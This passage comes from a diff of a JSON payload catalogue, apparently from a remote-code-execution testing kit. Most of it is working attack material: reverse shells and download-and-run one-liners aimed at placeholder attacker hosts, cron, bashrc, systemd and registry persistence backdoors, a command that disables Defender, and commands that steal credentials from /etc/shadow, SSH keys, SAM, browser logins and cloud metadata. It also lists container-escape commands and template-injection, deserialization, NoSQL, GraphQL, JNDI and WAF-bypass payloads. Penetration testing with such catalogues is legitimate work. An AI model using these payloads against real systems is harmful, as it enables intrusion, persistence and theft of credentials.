-                "wmic qfe get Caption,Description,HotFixID,InstalledOn",
-                "powershell -Command \"Get-Service | Where-Object {$_.Status -eq 'Running' -and $_.StartType -eq 'Auto'}\""
-            ],
-            "docker": [
-                "cat /proc/self/cgroup",
-                "ls -l /host 2>/dev/null",
-                "find / -maxdepth 2 -name docker.sock 2>/dev/null"
-            ],
-            "kubernetes": [
-                "kubectl auth can-i * *",
-                "kubectl describe clusterrolebinding",
-                "kubectl get pods -A -o wide"
-            ]
-        },
-        "persistence": {
-            "unix": [
-                "echo '@reboot /usr/bin/curl http://{attacker_domain}/shell.sh | sh' | crontab -",
-                "echo '*/5 * * * * /usr/bin/wget http://{attacker_domain}/payload.sh -O /tmp/payload.sh && sh /tmp/payload.sh' >> /etc/crontab",
-                "echo 'bash -i >& /dev/tcp/{attacker_ip}/443 0>&1' >> ~/.bashrc",
-                "mkdir -p ~/.config/systemd/user; echo -e '[Service]\nExecStart=/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"\n[Install]\nWantedBy=default.target' > ~/.config/systemd/user/update.service",
-                "echo '*/10 * * * * root /usr/bin/python3 -c \"import urllib.request; exec(urllib.request.urlopen(\\'http://{attacker_domain}/s.py\\').read())\"' >> /etc/cron.d/system"
-            ],
-            "windows": [
-                "reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v Updater /t REG_SZ /d C:\\\\Windows\\\\Temp\\\\backdoor.exe /f",
-                "schtasks /Create /SC ONLOGON /TN Updater /TR \\\"powershell.exe -ExecutionPolicy Bypass -File %TEMP%\\\\backdoor.ps1\\\" /F",
-                "powershell -Command \"New-ItemProperty -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name Sync -Value 'powershell -nop -w hidden -c Invoke-WebRequest http://{attacker_domain}/sync.ps1 -OutFile $env:TEMP\\\\sync.ps1; & $env:TEMP\\\\sync.ps1'\"",
-                "powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"",
-                "copy %SystemRoot%\\\\System32\\\\cmd.exe %APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\update.exe"
-            ]
-        },
-        "cloud_metadata": {
-            "unix": [
-                "curl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",
-                "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/",
-                "wget -q -O- http://169.254.169.254/metadata/instance?api-version=2021-02-01 -H 'Metadata:true'",
-                "aws sts get-caller-identity",
-                "curl http://100.100.100.200/latest/meta-data/ram/security-credentials/"
-            ],
-            "windows": [
-                "powershell -Command \"Invoke-WebRequest -Headers @{'Metadata-Flavor'='Google'} -Uri http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\"",
-                "powershell -Command \"Invoke-RestMethod -Headers @{Metadata='true'} -Uri http://169.254.169.254/metadata/instance?api-version=2021-02-01\"",
-                "powershell -Command \"Invoke-WebRequest -Uri http://169.254.169.254/latest/meta-data/iam/security-credentials/\"",
-                "powershell -Command \"Invoke-RestMethod -Uri http://100.100.100.200/latest/meta-data/ram/security-credentials/\""
-            ],
-            "docker": [
-                "curl --connect-timeout 1 http://169.254.169.254/latest/meta-data/",
-                "ip route",
-                "nsenter --target 1 --mount --uts --ipc --net --pid curl http://169.254.169.254/latest/meta-data/"
-            ],
-            "kubernetes": [
-                "kubectl get secrets -n kube-system aws-auth -o yaml",
-                "curl -k -H 'Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)' https://kubernetes.default.svc/api",
-                "kubectl get configmap -n kube-system cluster-info -o yaml"
-            ]
-        },
-        "database_enumeration": {
-            "unix": [
-                "mysql -e \"SHOW DATABASES;\"",
-                "psql -c \"SELECT table_schema,table_name FROM information_schema.tables LIMIT 10;\"",
-                "mongo --quiet --eval \"db.adminCommand({listDatabases:1})\"",
-                "sqlite3 /etc/passwd \"SELECT * FROM sqlite_master;\"",
-                "redis-cli INFO"
-            ],
-            "windows": [
-                "sqlcmd -Q \"SELECT name FROM sys.databases\"",
-                "powershell -Command \"Invoke-Sqlcmd -Query \"\"SELECT name FROM master..sysdatabases\"\"\"",
-                "wmic path win32_service get Name,PathName | findstr /i sql"
-            ],
-            "php": [
-                "$pdo = new PDO('mysql:host=127.0.0.1', 'root', ''); foreach($pdo->query('SHOW DATABASES') as $row){echo $row[0] . \"\\n\";}",
-                "echo mysqli_get_host_info(mysqli_connect('127.0.0.1', 'root', ''));",
-                "$db = new PDO('sqlite:/var/www/html/database.sqlite'); foreach($db->query('SELECT name FROM sqlite_master') as $row){echo $row['name'];}"
-            ],
-            "python": [
-                "import sqlite3; [print(row) for row in sqlite3.connect('app.db').execute(\"SELECT name FROM sqlite_master WHERE type='table'\")]",
-                "import pymongo; client = pymongo.MongoClient('mongodb://127.0.0.1:27017'); print(client.list_database_names())",
-                "import mysql.connector; conn = mysql.connector.connect(user='root',password='',host='127.0.0.1'); cursor = conn.cursor(); cursor.execute('SHOW DATABASES'); print(cursor.fetchall())"
-            ]
-        },
-        "lateral_movement": {
-            "unix": [
-                "ssh -oStrictHostKeyChecking=no user@{attacker_ip}",
-                "for host in $(cut -d' ' -f1 /etc/hosts); do ssh -oBatchMode=yes $host uptime; done",
-                "scp /etc/passwd {attacker_ip}:/tmp/passwd_copy",
-                "ansible all -i {attacker_ip}, -m shell -a 'whoami'",
-                "rsh {attacker_ip} whoami"
-            ],
-            "windows": [
-                "wmic /node:{attacker_ip} process call create 'cmd.exe /c whoami'",
-                "psexec \\\\{attacker_ip} cmd.exe /c whoami",
-                "winrs -r:{attacker_ip} cmd",
-                "powershell -Command \"Invoke-Command -ComputerName {attacker_ip} -ScriptBlock { whoami }\"",
-                "net use \\\\{attacker_ip}\\\\C$"
-            ]
-        },
-        "waf_bypass": {
-            "unix": [
-                "cat${IFS}/etc/passwd",
-                "cat$IFS/etc/passwd",
-                "cat${IFS%??}/etc/passwd",
-                "{cat,/etc/passwd}",
-                "cat</etc/passwd",
-                "who$@ami",
-                "uname${IFS}-a",
-                "i\\d"
-            ],
-            "windows": [
-                "who^ami",
-                "wh^o^ami",
-                "type%09C:\\Windows\\win.ini",
-                "cmd /c who^ami"
-            ]
-        },
-        "oob": {
-            "unix": [
-                "curl http://{oob}/",
-                "wget -qO- http://{oob}/",
-                "nslookup {oob}",
-                "ping -c 1 {oob}",
-                "dig {oob}",
-                "curl http://{oob}/$(whoami)",
-                "curl http://$(whoami).{oob}/"
-            ],
-            "windows": [
-                "nslookup {oob}",
-                "powershell -c \"Invoke-WebRequest -UseBasicParsing http://{oob}/\"",
-                "powershell -c \"Resolve-DnsName {oob}\"",
-                "certutil -urlcache -f http://{oob}/ %TEMP%\\x",
-                "cmd /c nslookup %USERNAME%.{oob}"
-            ],
-            "java": [
-                "${jndi:ldap://{oob}/a}",
-                "${jndi:dns://{oob}/a}",
-                "${jndi:rmi://{oob}/a}"
-            ]
-        },
-        "nosql_injection": {
-            "mongodb": {
-                "operator_injection": [
-                    "{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null}}",
-                    "{\"username\": {\"$gt\": \"\"}, \"password\": {\"$gt\": \"\"}}",
-                    "{\"username\": \"admin\", \"password\": {\"$regex\": \"^.*\"}}",
-                    "username[$ne]=admin&password[$ne]=x",
-                    "{\"$or\": [{}, {\"x\": \"y\"}], \"username\": \"admin\"}"
-                ],
-                "where_js": [
-                    "{\"$where\": \"return true\"}",
-                    "{\"$where\": \"this.password == this.username\"}",
-                    "{\"$where\": \"sleep(5000)\"}",
-                    "admin' || '1'=='1",
-                    "'; return true; var x='"
-                ],
-                "server_side_js": [
-                    "{\"$expr\": {\"$function\": {\"body\": \"function(){return true}\", \"args\": [], \"lang\": \"js\"}}}",
-                    "{\"$expr\": {\"$function\": {\"body\": \"function(){return sleep(5000)}\", \"args\": [], \"lang\": \"js\"}}}",
-                    "{\"$accumulator\": {\"init\": \"function(){return sleep(5000)}\", \"accumulate\": \"function(){}\", \"accumulateArgs\": [], \"merge\": \"function(){}\", \"lang\": \"js\"}}"
-                ]
-            }
-        },
-        "graphql_injection": {
-            "graphql": {
-                "introspection": [
-                    "{__schema{types{name}}}",
-                    "{__schema{queryType{name} mutationType{name} types{name fields{name}}}}",
-                    "{__type(name:\"User\"){name fields{name type{name kind}}}}",
-                    "query{__typename}"
-                ],
-                "injection": [
-                    "{ user(id: \"1; id\") { name } }",
-                    "{ user(id: \"1' OR '1'='1-- \") { name } }",
-                    "{ search(q: \"$(id)\") { id } }",
-                    "{ file(path: \"../../../../etc/passwd\") { content } }",
-                    "{ user(id: \"1${IFS}||${IFS}id\") { name } }"
-                ],
-                "batching": [
-                    "{ a: user(id:\"1\"){name} b: user(id:\"2\"){name} c: user(id:\"3\"){name} }",
-                    "query { a { b { c { d { e } } } } }"
-                ]
-            }
-        }
+  "payload_categories": {
+    "basic_enum": {
+      "unix": [
+        "id",
+        "whoami",
+        "uname -a",
+        "pwd",
+        "ls -la",
+        "ps aux",
+        "uptime",
+        "cat /etc/os-release",
+        "env",
+        "last -n 5",
+        "lsb_release -a 2>/dev/null"
+      ],
+      "windows": [
+        "whoami",
+        "ver",
+        "dir",
+        "tasklist",
+        "ipconfig",
+        "systeminfo",
+        "wmic os get Caption,CSDVersion,OSArchitecture,Version",
+        "set",
+        "query user",
+        "whoami /groups"
+      ]
     },
-    "detection_payloads": {
-        "unix": [
-            "echo DETECTION_{canary}",
-            "sleep 5",
-            "printf 'canary:%s' $(hostname)",
-            "command -v whoami && echo HEALTH_{canary}",
-            "printf 'det:%s' $(id -u)",
-            "curl http://{oob}/",
-            "nslookup {oob}"
+    "file_operations": {
+      "unix": [
+        "cat /etc/passwd",
+        "cat /etc/shadow",
+        "head -n 10 /etc/passwd",
+        "tail -f /var/log/syslog",
+        "find / -name '*.conf' -type f 2>/dev/null",
+        "ls -la /root 2>/dev/null",
+        "find /home -maxdepth 2 -type f -name '.ssh' 2>/dev/null",
+        "find / -perm -4000 -type f 2>/dev/null",
+        "getfacl -R /home 2>/dev/null",
+        "tar -cf /tmp/etc_backup.tar /etc 2>/dev/null"
+      ],
+      "windows": [
+        "type C:\\Windows\\System32\\drivers\\etc\\hosts",
+        "dir C:\\Windows\\System32\\drivers\\etc",
+        "dir C:\\Users",
+        "dir C:\\\\ProgramData",
+        "type C:\\\\Windows\\\\System32\\\\config\\\\SAM 2>nul",
+        "dir %USERPROFILE%\\\\Documents",
+        "type %USERPROFILE%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data 2>nul"
+      ]
+    },
+    "network_operations": {
+      "unix": [
+        "ifconfig",
+        "netstat -tulpn",
+        "arp -a",
+        "ping -c 4 127.0.0.1",
+        "ip addr",
+        "ss -tunlp",
+        "route -n",
+        "dig +short myip.opendns.com @resolver1.opendns.com"
+      ],
+      "windows": [
+        "ipconfig /all",
+        "netstat -ano",
+        "arp -a",
+        "ping -n 4 127.0.0.1",
+        "Get-NetIPConfiguration",
+        "route print",
+        "powershell -Command \"Resolve-DnsName {attacker_domain}\"",
+        "powershell -Command \"(Invoke-WebRequest -UseBasicParsing https://ifconfig.me).Content\""
+      ]
+    },
+    "code_execution": {
+      "nodejs": {
+        "child_process_exec": [
+          "require('child_process').exec('whoami')",
+          "require('child_process').exec('cat /etc/passwd | nc {attacker_ip} 443')",
+          "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"')",
+          "require('child_process').spawnSync('whoami').stdout.toString()",
+          "process.mainModule.require('child_process').exec('id')"
         ],
-        "windows": [
-            "echo DETECTION_{canary}",
-            "timeout /T 5",
-            "powershell -Command \"Start-Sleep -Seconds 3; Write-Output 'DETECTION_{canary}'\"",
-            "for /f \"tokens=2 delims==\" %i in (\"%TIME%\") do @echo DETECTION_{canary}:%i",
-            "powershell -Command \"[Console]::WriteLine('det-{canary}')\"",
-            "nslookup {oob}"
+        "pug_ssti": [
+          "= 7 * 7",
+          "= require('child_process').exec('whoami')",
+          "= global.process.mainModule.require('child_process').exec('id')"
         ],
-        "php": [
-            "echo 'DETECTION_{canary}';",
-            "error_log('DETECTION_{canary}');",
-            "var_dump('DETECTION_{canary}');"
+        "ejs_ssti": [
+          "<%= 7 * 7 %>",
+          "<%= require('child_process').exec('whoami') %>",
+          "<%- global.process.mainModule.require('child_process').exec('id') %>"
         ],
-        "python": [
-            "print('DETECTION_{canary}')",
-            "import time; time.sleep(2)",
-            "import os; print(f'detect:{canary}:{os.getpid()}')",
-            "__import__('time').sleep(1)"
+        "handlebars_ssti": [
+          "{{7 * 7}}",
+          "{{ {math} }}",
+          "{{lookup (lookup (lookup (lookup __proto__ 'constructor') 'constructor') 'call') 'whoami'}}",
+          "{{#with (lookup (lookup this '__proto__') 'constructor')}}{{#with (lookup this 'constructor')}}{{call this 'cat /etc/passwd'}}{{/with}}{{/with}}"
         ],
-        "nodejs": [
-            "console.log('DETECTION_{canary}')",
-            "setTimeout(()=>console.log('timer {canary}'), 1000)",
-            "process.stdout.write('detect-{canary}')",
-            "setImmediate(()=>console.log('det:{canary}'))"
+        "vm_eval": [
+          "(new (require('vm').Script)(`require('child_process').exec('whoami')`)).runInThisContext()",
+          "vm.runInNewContext(`require('child_process').exec('curl http://{attacker_domain}/x.sh | sh')`, {}, { timeout: 1000 })",
+          "require('vm').runInNewContext(`process.mainModule.require('child_process').exec('id')`)"
         ],
-        "java": [
-            "System.out.println(\"DETECTION_{canary}\");",
-            "Thread.sleep(2000);",
-            "System.err.println(\"DETECTION_{canary}\");",
-            "System.out.printf(\"det:%s\\n\", \"{canary}\");"
+        "deserialization": [
+          "const serialize = require('node-serialize'); const payload = \"{\\\"rce\\\": \\\"_$$ND_FUNC$$_function(){require('child_process').exec('id');}()\\\"}\"; serialize.unserialize(payload);",
+          "const payload = \"{\\\"rce\\\":\\\"_$$ND_FUNC$$_function(){process.mainModule.require('child_process').exec('id');}()\\\"}\"; require('node-serialize').unserialize(payload);"
         ],
-        "dotnet": [
-            "Console.WriteLine(\"DETECTION_{canary}\");",
-            "System.Threading.Thread.Sleep(2000);",
-            "Console.Error.WriteLine(\"det-{canary}\");"
-        ],
-        "docker": [
-            "echo 'detector:{canary}'",
-            "sleep 2",
-            "cat /proc/1/cgroup | head -n 5"
-        ],
-        "kubernetes": [
-            "kubectl get pods --namespace default",
-            "echo 'kube-detect-{canary}'",
-            "kubectl cluster-info"
-        ],
-        "ruby": [
-            "puts 'DETECTION_{canary}'",
-            "sleep 1"
-        ],
-        "perl": [
-            "print \"DETECTION_{canary}\\n\";",
-            "select(undef, undef, undef, 1);"
-        ],
-        "go": [
-            "fmt.Println(\"DETECTION_{canary}\")",
-            "time.Sleep(1 * time.Second)"
-        ],
-        "sql": [
-            "SELECT 'DETECTION_{canary}';",
-            "SELECT pg_sleep(1);"
-        ],
-        "powershell": [
-            "Write-Output \"DETECTION_{canary}\"",
-            "Start-Sleep -Milliseconds 500"
+        "expression_template": [
+          "{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
+          "={{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
+          "{{ (function(){ return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}",
+          "={{ $jmespath ? '' : (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}"
         ]
+      },
+      "python": {
+        "os_system": [
+          "os.system('whoami')",
+          "os.system('cat /etc/passwd')",
+          "os.system('bash -i >& /dev/tcp/{attacker_ip}/443 0>&1')",
+          "__import__('os').system('id')",
+          "os.popen('hostname').read()"
+        ],
+        "subprocess": [
+          "subprocess.call(['whoami'], shell=True)",
+          "subprocess.Popen('cat /etc/passwd', shell=True).communicate()",
+          "subprocess.check_output('uname -a', shell=True)"
+        ],
+        "jinja2_ssti": [
+          "{{7*7}}",
+          "{{ {math} }}",
+          "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
+          "{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}",
+          "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
+          "{{cycler.__init__.__globals__['os'].popen('whoami').read()}}",
+          "{{''.__class__.__mro__[2].__subclasses__()[40]('/bin/sh',shell=True,stdout=-1).communicate()}}"
+        ],
+        "exec_ast": [
+          "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef _(): pass",
+          "@exec(\"raise Exception(open('/etc/passwd').read())\")\ndef _(): pass",
+          "def _(a=exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")): pass",
+          "def _(a=exec(\"raise Exception(open('/etc/passwd').read())\")): pass",
+          "def _(a=__import__('os').system('id')): pass"
+        ]
+      },
+      "postgres": {
+        "psql_meta_command": [
+          "SELECT 1;\n\\! id\n",
+          "SELECT 1;\n\\! cat /etc/passwd\n",
+          {
+            "payload": "SELECT 1;\r\\! id\r",
+            "notes": [
+              "CR (\\r) separates the meta-command so a newline-based validator (e.g. pgAdmin CVE-2025-13780) does not detect the \\! line"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! cat /etc/passwd\r",
+            "notes": [
+              "CR (\\r) meta-command bypass; psql still executes \\! after splitting on CR"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! bash -c 'id > /tmp/rcekit_{canary}'\r",
+            "expected_channel": "response",
+            "notes": [
+              "blind sink: confirm out-of-band or via the written marker rather than the HTTP response"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! curl -s {callback}\r",
+            "notes": [
+              "blind async sink: {callback} is filled by the chain runner with the OOB listener URL; confirmation is the received callback, not the HTTP response"
+            ]
+          },
+          {
+            "payload": "SELECT 1;\r\\! python3 -c 'import urllib.request;urllib.request.urlopen(\"{callback}\")'\r",
+            "notes": [
+              "blind async sink, curl-free OOB callback via python3; confirmed by the received callback"
+            ]
+          }
+        ]
+      },
+      "php": {
+        "exec_system": [
+          "system('whoami')",
+          "exec('whoami')",
+          "shell_exec('whoami')",
+          "passthru('whoami')",
+          "eval('system(\"whoami\")')",
+          "preg_replace('/.*/e','system(\"whoami\")','')",
+          "$output = shell_exec('whoami'); echo $output;",
+          "system($_GET['cmd']);",
+          "shell_exec('curl http://{attacker_domain}/payload.sh | sh');"
+        ],
+        "eval": [
+          "assert(\"system('whoami')\");",
+          "@create_function(\"\", \"system('ls');\");",
+          "eval(base64_decode('c3lzdGVtKCd3aG9hbWknKTs='));"
+        ],
+        "deserialize": [
+          "$payload = file_get_contents('php://input'); $object = unserialize($payload);",
+          "$obj = unserialize($_POST['payload']); var_dump($obj);"
+        ]
+      },
+      "java": {
+        "runtime_exec": [
+          "Runtime.getRuntime().exec(\"whoami\")",
+          "new ProcessBuilder(\"whoami\").start()",
+          "Runtime.getRuntime().exec(\"cat /etc/passwd\")",
+          "Process process = new ProcessBuilder().command(\"bash\",\"-c\",\"id\").start();",
+          "Runtime.getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"});"
+        ],
+        "freemarker_ssti": [
+          "${7*7}",
+          "${'freemarker.template.utility.Execute'?new()('id')}",
+          "<#assign ex = 'freemarker.template.utility.Execute'?new()>${ ex('id')}",
+          "${'freemarker.template.utility.Execute'?new()('cat /etc/passwd')}"
+        ],
+        "velocity_ssti": [
+          "#set($x='') $x",
+          "#set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $d=$ex.getInputStream() $d=$chr.toChars($d.readBytes($d.available())) $out=$str.valueOf($d) $out",
+          "#set($process=$x.class.forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')) $process"
+        ],
+        "thymeleaf_ssti": [
+          "[[${7*7}]]",
+          "[[${T(java.lang.Runtime).getRuntime().exec('id')}]]",
+          "[[${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}]]"
+        ],
+        "deserialization": [
+          "new ObjectInputStream(new ByteArrayInputStream(payload)).readObject(); // ysoserial gadget",
+          "new ObjectInputStream(new FileInputStream(\"payload.bin\")).readObject();"
+        ],
+        "expression": [
+          "javax.script.ScriptEngineManager m = new javax.script.ScriptEngineManager(); m.getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('id')\");",
+          "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"java.lang.Runtime.getRuntime().exec('cat /etc/passwd')\");"
+        ],
+        "spel": [
+          "T(java.lang.Runtime).getRuntime().exec(\"id\")",
+          "new java.lang.ProcessBuilder(new String[]{\"bash\",\"-c\",\"id\"}).start()",
+          "T(java.lang.Runtime).getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"})"
+        ],
+        "ognl": [
+          "(#rt=@java.lang.Runtime@getRuntime()).exec(\"id\")",
+          "%{(#rt=@java.lang.Runtime@getRuntime()).(#rt.exec(\"id\"))}",
+          "(#cmd=\"id\").(#p=new java.lang.ProcessBuilder(#cmd)).(#p.start())"
+        ],
+        "groovy": [
+          "\"id\".execute()",
+          "[\"bash\",\"-c\",\"id\"].execute()",
+          "Runtime.getRuntime().exec(\"id\")",
+          "this.class.classLoader.parseClass(\"Runtime.getRuntime().exec('id')\").newInstance()"
+        ]
+      },
+      "dotnet": {
+        "process_start": [
+          "Process.Start(\"whoami.exe\")",
+          "Process.Start(\"cmd.exe\", \"/c whoami\")",
+          "new Process { StartInfo = new ProcessStartInfo { FileName = \"cmd.exe\", Arguments = \"/c whoami\" } }.Start()",
+          "Process.Start(new ProcessStartInfo(\"cmd.exe\"){Arguments=\"/c whoami\",UseShellExecute=false,RedirectStandardOutput=true});",
+          "System.Diagnostics.Process.Start(\"powershell.exe\",\"-Command \\\"Get-Process\\\"\");"
+        ],
+        "deserialize": [
+          "new BinaryFormatter().Deserialize(new MemoryStream(payload)); // Gadget execution",
+          "new NetDataContractSerializer().Deserialize(new MemoryStream(payload));"
+        ]
+      },
+      "ruby": {
+        "kernel_system": [
+          "system('whoami')",
+          "`whoami`",
+          "Kernel.system('whoami')",
+          "Kernel.exec('whoami')",
+          "IO.popen('id'){|io| io.read }",
+          "%x(id)"
+        ],
+        "erb_ssti": [
+          "<%= 7 * 7 %>",
+          "<%= `whoami` %>",
+          "<%= File.open('/etc/passwd').read %>",
+          "<%= IO.popen('id'){|io| io.read } %>"
+        ]
+      },
+      "perl": {
+        "system_backticks": [
+          "system('whoami')",
+          "`whoami`",
+          "exec('whoami')",
+          "print `id`;",
+          "open(my $fh, '-|', 'id'); while(<$fh>){print;}"
+        ]
+      },
+      "go": {
+        "os_exec": [
+          "exec.Command(\"whoami\").Output()",
+          "exec.Command(\"bash\", \"-c\", \"whoami\").Output()",
+          "exec.Command(\"cat\", \"/etc/passwd\").Output()",
+          "cmd := exec.Command(\"sh\",\"-c\",\"id\"); out, _ := cmd.CombinedOutput(); string(out)",
+          "exec.Command(\"powershell\",\"-Command\",\"whoami\").Output()"
+        ]
+      }
+    },
+    "download_execute": {
+      "unix": [
+        "curl http://{attacker_domain}/shell.sh | sh",
+        "wget http://{attacker_domain}/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
+        "python3 -c \"import urllib.request; exec(urllib.request.urlopen('http://{attacker_domain}/shell.py').read())\"",
+        "perl -e 'use LWP::Simple; getstore(\"http://{attacker_domain}/shell\", \"/tmp/shell\"); system(\"/tmp/shell\");'",
+        "php -r \"$c=file_get_contents('http://{attacker_domain}/payload.php'); eval($c);\""
+      ],
+      "windows": [
+        "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://{attacker_domain}/shell.ps1')\"",
+        "certutil -urlcache -f http://{attacker_domain}/shell.exe shell.exe && shell.exe",
+        "bitsadmin /transfer job /download /priority high http://{attacker_domain}/shell.exe shell.exe && shell.exe",
+        "powershell -c \"Invoke-WebRequest -Uri 'http://{attacker_domain}/shell.ps1' -OutFile $env:TEMP\\shell.ps1; . $env:TEMP\\shell.ps1\""
+      ]
+    },
+    "reverse_shells": {
+      "unix": [
+        "bash -i >& /dev/tcp/{attacker_ip}/443 0>&1",
+        "nc -e /bin/sh {attacker_ip} 443",
+        "python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"{attacker_ip}\",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'",
+        "perl -e 'use Socket;$i=\"{attacker_ip}\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
+        "php -r '$sock=fsockopen(\"{attacker_ip}\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
+      ],
+      "windows": [
+        "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()\"",
+        "powershell -nop -w hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"",
+        "cmd.exe /c powershell -Command \"$sm=(New-Object Net.Sockets.TCPClient('{attacker_ip}',443)).GetStream();$sw=New-Object IO.StreamWriter($sm);$sr=New-Object IO.StreamReader($sm);while(($cmd=$sr.ReadLine()) -ne $null){$send=(iex $cmd 2>&1 | Out-String);$sw.WriteLine($send);$sw.Flush()}\""
+      ]
+    },
+    "container_escape": {
+      "docker": [
+        "cat /proc/1/environ",
+        "nsenter --target 1 --mount --uts --ipc --net --pid /bin/sh",
+        "cp /bin/sh /host/tmp/sh && chmod +s /host/tmp/sh",
+        "mount | grep overlay",
+        "docker run -v /:/host alpine chroot /host /bin/sh"
+      ],
+      "kubernetes": [
+        "kubectl get pods --namespace kube-system",
+        "kubectl run rce --image=alpine --restart=Never --command -- sh -c 'nc {attacker_ip} 443 -e /bin/sh'",
+        "kubectl exec -n kube-system kube-apiserver-0 -- cat /etc/kubernetes/admin.conf",
+        "kubectl auth can-i --list",
+        "kubectl get secrets -A"
+      ]
+    },
+    "credential_access": {
+      "unix": [
+        "grep -Ri 'password' /etc 2>/dev/null",
+        "ls -la ~/.ssh",
+        "cat ~/.ssh/id_rsa 2>/dev/null",
+        "find / -name 'id_rsa' -o -name '*.kdbx' 2>/dev/null",
+        "awk -F: '{ if ($2 != \"*\" && $2 != \"!\") print $1 }' /etc/shadow 2>/dev/null"
+      ],
+      "windows": [
+        "cmdkey /list",
+        "dir C:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials",
+        "reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon",
+        "findstr /si password *.txt *.config *.ini",
+        "type %USERPROFILE%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\* 2>nul"
+      ],
+      "php": [
+        "$config = include 'config.php'; var_dump($config);",
+        "echo file_get_contents(__DIR__ . '/.env');",
+        "echo file_get_contents('/var/www/html/config/database.php');"
+      ],
+      "python": [
+        "import os; print(os.environ.get('AWS_SECRET_ACCESS_KEY'))",
+        "from pathlib import Path; print(Path.home().joinpath('.aws','credentials').read_text())",
+        "import keyring; print(keyring.get_keyring())"
+      ]
+    },
+    "privilege_escalation": {
+      "unix": [
+        "sudo -l",
+        "cat /etc/sudoers",
+        "find / -perm -4000 -type f 2>/dev/null",
+        "getcap -r / 2>/dev/null",
+        "grep -R 'NOPASSWD' /etc/sudoers /etc/sudoers.d 2>/dev/null"
+      ],
+      "windows": [
+        "whoami /priv",
+        "whoami /groups",
+        "icacls C:\\\\Windows\\\\System32\\\\cmd.exe",
+        "wmic qfe get Caption,Description,HotFixID,InstalledOn",
+        "powershell -Command \"Get-Service | Where-Object {$_.Status -eq 'Running' -and $_.StartType -eq 'Auto'}\""
+      ],
+      "docker": [
+        "cat /proc/self/cgroup",
+        "ls -l /host 2>/dev/null",
+        "find / -maxdepth 2 -name docker.sock 2>/dev/null"
+      ],
+      "kubernetes": [
+        "kubectl auth can-i * *",
+        "kubectl describe clusterrolebinding",
+        "kubectl get pods -A -o wide"
+      ]
+    },
+    "persistence": {
+      "unix": [
+        "echo '@reboot /usr/bin/curl http://{attacker_domain}/shell.sh | sh' | crontab -",
+        "echo '*/5 * * * * /usr/bin/wget http://{attacker_domain}/payload.sh -O /tmp/payload.sh && sh /tmp/payload.sh' >> /etc/crontab",
+        "echo 'bash -i >& /dev/tcp/{attacker_ip}/443 0>&1' >> ~/.bashrc",
